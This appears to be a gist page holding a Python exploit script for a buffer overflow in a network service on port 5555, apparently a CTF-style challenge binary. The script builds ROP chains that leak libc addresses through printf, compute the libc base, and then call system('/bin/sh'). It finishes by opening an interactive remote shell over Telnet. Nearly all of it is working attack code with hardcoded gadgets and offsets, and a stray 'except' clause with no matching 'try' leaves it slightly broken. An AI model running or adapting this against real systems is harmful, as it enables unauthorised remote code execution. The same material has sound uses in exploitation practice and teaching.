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Last active April 15, 2020 00:54
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#!/usr/bin/env python3
from struct import pack,unpack
from telnetlib import Telnet
import socket
import sys
TARGET = ("",5555) # Target IP and PORT
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)# Make a TCP socket
p64 = lambda x: pack("Q",x) # To Convert to little endian
u64 = lambda x: unpack("Q",x)[0] # Convert leaked bytes to address.
def checkTerms(term,payload): # function to check for any bad chars in payload.
if term in payload:
print("Found",hex(ord(term)),"in payload, exit.")
sys.exit(0) # exit if there are bad chars in payload.
start = 0x400530
printf_plt = 0x400500
printf_got = 0x601018
scanf_got = 0x601028
perc_s = 0x400758
pop_rdi = 0x400723
pop_rsi_r15 = 0x400721
buf = b'A'*216 # payload in bytes form for python3 to send through socket.
buf+= p64(pop_rdi)
buf+= p64(perc_s) # goes to rdi
buf+= p64(pop_rsi_r15)
buf+= p64(printf_got) # goes to rsi
buf+= p64(printf_got) # goes to r15
buf+= p64(printf_plt)
buf+= p64(pop_rdi)
buf+= p64(perc_s) # goes to rdi
buf+= p64(pop_rsi_r15)
buf+= p64(scanf_got) # goes to rsi
buf+= p64(scanf_got) # goes to r15
buf+= p64(printf_plt)
buf+= p64(start) # start the program again.
checkTerms(b'\n',buf) # newline is a bad char if between payload.
buf+= b'\n' # add new line at end to enter input.
checkTerms(b'\x20',buf) # whitespace is a bad char.
print("[i] Payload ready.")
s.connect(TARGET) # connect to target server
s.send(buf) # send payload
print("[i] Payload sent.")
resp=s.recv(1024) # receive response.
print("[i] Reply received.")
leaks = resp.split(b"received.")[1] # just split reponse to find addreses
printf_libc = u64(leaks[:6].ljust(8,b'\x00')) # pad with null bytes as address should be of 8 bytes
scanf_libc = u64(leaks[6:12].ljust(8,b'\x00'))
print("[*] Leaked libc printf:\t\t",hex(printf_libc))
print("[*] Leaked libc __isoc99_scanf:\t",hex(scanf_libc))
printf_libc_off = 0x064e80
libc_base = printf_libc - printf_libc_off # calculate libc base address.
print("[*] Calculated libc base:\t",hex(libc_base))
system = libc_base + 0x04f440 # system offset
bin_sh = libc_base + 0x1b3e9a # str_bin_sh offset
ret = 0x400661 # ret instruction gadget in binary.
buf = b'B'*216 # junk
buf+= p64(ret) # execute 'ret' to make stack 16 bytes aligned by popping off 8 bytes off top of stack and returning to it.
buf+= p64(pop_rdi)
buf+= p64(bin_sh) # goes to rdi
buf+= p64(system) # call system
checkTerms(b'\n',buf) # newline is a bad char if between payload.
buf+= b'\n' # add new line at end to enter input.
checkTerms(b'\x20',buf) # whitespace is a bad char
print("[i] Shell payload ready.")
s.send(buf) # send payload
print("[i] Payload sent.")
t=Telnet() # make a telnet object
t.sock=s # assign our socket to Telnet
t.write(b'\nuname -a\nid\n') # Enter some commands
print("[i] Attempting interactive shell.")
t.interact() # interactive telnet shell.
except UnicodeDecodeError:
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